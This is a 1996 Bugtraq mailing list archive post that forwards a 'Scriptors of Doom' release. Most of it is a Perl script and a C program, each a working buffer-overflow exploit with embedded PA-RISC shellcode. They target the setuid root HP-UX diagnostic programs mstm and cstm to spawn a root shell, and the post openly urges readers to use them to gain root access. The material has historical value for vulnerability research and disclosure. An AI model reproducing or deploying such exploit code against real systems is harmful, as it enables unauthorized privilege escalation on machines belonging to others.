Bugtraq mailing list archives
This week: turn me on, dead man
From: aleph1 () underground org (Aleph One)
Date: Sat, 16 Nov 1996 11:38:33 -0800
From our SOD friends. Sponsored by the HP security team & the
energizer bunny. They keep going, and going, and going. Aleph One / aleph1 () underground org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 --- cut here --- Well, hello. Welcome back. We're glad to see you. Have a drink. Take off that overcoat. Put down that submachine gun. Lay on the couch and pretend you're a duck. I'll be over here sending scripts to the masses. This week's script is the first of the buffer-overruns and it buggers up two very similar setuid root programs in /usr/diag/bin, mstm and cstm. It's only been playtested on the 9's, so use with care on the 10's, and as always, start clicking your way to root access with scripts from the folks at SOD. Caveat Emptor mstm and/or cstm loves you perl script and C src for this week --- stmo.pl --- #!/usr/bin/perl # working exlpoit for 9.X setuid root /usr/diag/bin/[cm]stm use FileHandle; sub h2cs { local($stuff)=@_; local($rv); while($stuff !~ /^$/) { $bob=$stuff; $bob =~ s/^(..).*$/$1/; $stuff =~ s/^..//; $rv.=chr(oct("0x${bob}")); } return $rv; } $code="AA"; # two byte alignment $code.=h2cs("34010102"); # ldi 129,r1 $code.=h2cs("08220401"); # sub rp,r1,r1 $code.=h2cs("602002a6"); # stb r0,339(r1) #$code.=h2cs("602002ac"); # stb r0,342(r1) $code.=h2cs("b43a0298"); # addi 332,r1,arg0 $code.=h2cs("34160176"); # ldi 187,r22 $code.=h2cs("34010276"); # ldi 315,r1 $code.=h2cs("08360216"); # and r22,r1,r22 $code.=h2cs("20200801"); # ldil l%c0000004,r1 $code.=h2cs("e420e008"); # ble 4(sr7,r1) $code.=h2cs("08210280"); # NOP == xor r1,r1,r0 #$code.=h2cs("deadcafe"); # illegal instruction $num=208-length($code); $code.="C"x$num; $data="/bin/sh.sh."; $num=16-length($data); $data.="D"x$num; $num=224-length($of); $of=$code.$data; $of.=h2cs("7b03301B"); print "Length is: ",length($of),"\n"; exec("/usr/diag/bin/mstm","-l","$of"); --- stmo.c --- /* SOD /usr/diag/bin/[cm]stm buffer overflow */ main() { char buf[500]; strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b"); execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0); /* Either-or, same overflow */ execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0); }
Current thread:
- Possible SunOS 5.5.1 sulogin vulnerability Jason R. Mastaler (Nov 13)
- Re: Possible SunOS 5.5.1 sulogin vulnerability Steve Blass (Nov 15)
- Re: Possible SunOS 5.5.1 sulogin vulnerability Doug Hughes (Nov 15)
- Re: Possible SunOS 5.5.1 sulogin vulnerability Casper Dik (Nov 15)
- Re: Possible SunOS 5.5.1 sulogin vulnerability Michael Douglass (Nov 15)
- El Programa Matador de Ascendes Scriptors of DOOM (Nov 16)
- El Programa Matador de Ascendes Aleph One (Nov 16)
- This week: turn me on, dead man Aleph One (Nov 16)
- Re: El Programa Matador de Little Boys I like so much Aleph One (Nov 16)
- Apologies to Kit Knox and all Aleph One (Nov 16)
- <Possible follow-ups>
- Re: Possible SunOS 5.5.1 sulogin vulnerability Mark Graff (Nov 15)